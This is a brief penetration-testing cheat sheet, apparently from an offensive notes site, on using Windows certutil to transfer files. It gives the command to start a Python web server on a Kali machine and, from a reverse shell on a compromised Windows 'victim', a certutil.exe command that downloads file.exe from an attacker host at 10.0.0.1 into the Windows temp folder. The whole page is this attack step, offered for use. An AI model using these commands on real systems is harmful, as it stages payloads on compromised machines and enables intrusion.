Certutil

#Start webservice on kali

Python -m SimpleHTTPServer 80

#From reverse shell copy to victim client

cd \windows\temp

certutil.exe -urlcache -split -f http://10.0.0.1/file.exe

Last updated